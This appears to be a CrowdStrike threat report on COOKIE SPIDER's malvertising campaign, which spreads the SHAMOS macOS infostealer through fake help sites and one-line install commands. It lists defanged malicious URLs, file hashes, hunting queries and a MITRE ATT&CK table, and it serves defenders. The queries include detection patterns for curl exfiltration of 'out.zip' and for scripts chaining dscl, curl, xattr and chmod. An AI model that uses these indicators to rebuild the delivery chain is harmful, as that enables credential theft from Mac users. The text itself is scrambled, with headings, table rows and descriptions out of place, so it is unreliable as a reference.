Falcon Platform Prevents COOKIE SPIDER’s SHAMOS Delivery on macOS

Assessment

rescue-mac[.]com
https[:]//macostutorial[.]com/iterm2/install[.]sh

Recommended Prevention Settings

https[:]//macostutorial[.]com/iterm2/update

• Suspicious process prevention
• Intelligence-sourced threat prevention

Threat Hunting Queries 

1. The legitimate iTerm2 GitHub repository is located at https[:]//github[.]com/gnachman/iTerm2.
https[:]//github[.]com/jeryrymoore/Iterm2

event_platform=Mac #event_simpleName=ProcessRollup2 ImageFileName="*/tmp/*"
| join({event_platform=Mac #event_simpleName=ProcessRollup2 ImageFileName="*osascript" CommandLine="*-e*" | rename(field="CommandLine", as="ChildCommandLine") | rename(field="ImageFileName", as="ChildImageFileName")}, field=TargetProcessId, key=ParentProcessId, include=["ChildImageFileName", "ChildCommandLine"], limit=20000)
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ImageFileName, CommandLine, ChildImageFileName, ChildCommandLine])

https[:]//icloudservers[.]com/gm/update
“Bash script execution with calls to risky LOOBINs”
CrowdStrike Counter Adversary Operations assesses that eCrime actors will likely continue to leverage both malvertising and one-line installation commands to distribute macOS information stealers. This assessment is made with high confidence, as the combination has historically been successful, and these methods allow actors to bypass Gatekeeper checks.
4549e2599de3011973fde61052a55e5cdb770348876abc82de14c2d99575790f
This campaign highlights that leveraging malvertising and the one-line installation-command technique to distribute macOS information stealers remains popular among eCrime actors. Promoting false malicious websites encourages more site traffic, which will lead to more potential victims. The one-line installation command enables eCrime actors to directly install the Mach-O executable onto the victim’s machine while bypassing Gatekeeper checks. Bash script SHA256 hashes https[:]//icloudservers[.]com/gm/install[.]sh

event_platform=Mac #event_simpleName=ScriptControlScanInfo ScriptContent="*dscl*curl*xattr*chmod*"
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ScriptContent])

b01c13969075974f555c8c88023f9abf891f72865ce07efbcee6c2d906d410d5
95b97a5da68fcb73c98cd9311c56747545db5260122ddf6fae7b152d3d802877
To protect endpoints from this threat, CrowdStrike Falcon® Insight XDR customers should ensure the following prevention policy settings are configured:
eb7ede285aba687661ad13f22f8555aab186debbadf2c116251cb269e913ef68 Bash script host URLs event_platform=Mac #event_simpleName=ProcessRollup2 FileName=curl CommandLine="*POST*out.zip*"
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ImageFileName, CommandLine])

Indicators of Compromise (IOCs)

IOC	Description
Malvertising websites containing instructions to download SHAMOS	The following table maps reported COOKIE SPIDER and SHAMOS tactics, techniques, and procedures (TTPs) to the MITRE ATT&CK® framework.
SHAMOS host URLs	NOTE: Make sure to update the Falcon URL to the cloud in which your environment is currently configured (US1, US2, EU, etc.) 231c4bf14c4145be77aa4fef36c208891d818983c520ba067dda62d3bbbf547f

MITRE ATT&CK Framework

a4e47fd76dc8ed8e147ea81765edc32ed1e11cff27d138266e3770c7cf953322

ID	Technique	Description
T1583.001	Acquire Infrastructure: Domains	The eCrime actor registered fake macOS help websites
T1189	Drive-by Compromise	Malvertising distributes websites containing SHAMOS installation instructions
T1204	User Execution	SHAMOS requires the user to execute the malicious installer command
T1027.010	Obfuscated Files or Information: Command Obfuscation	The malicious command uses Base64-encoding to obfuscate the Bash script download URL
T1105	Ingress Tool Transfer	The malicious Bash script downloads SHAMOS from an external URL

Additional Resources

The following CrowdStrike Falcon® Next-Gen SIEM Advanced Event Search queries are provided to assist defenders in hunting for this and similar activity across their endpoints.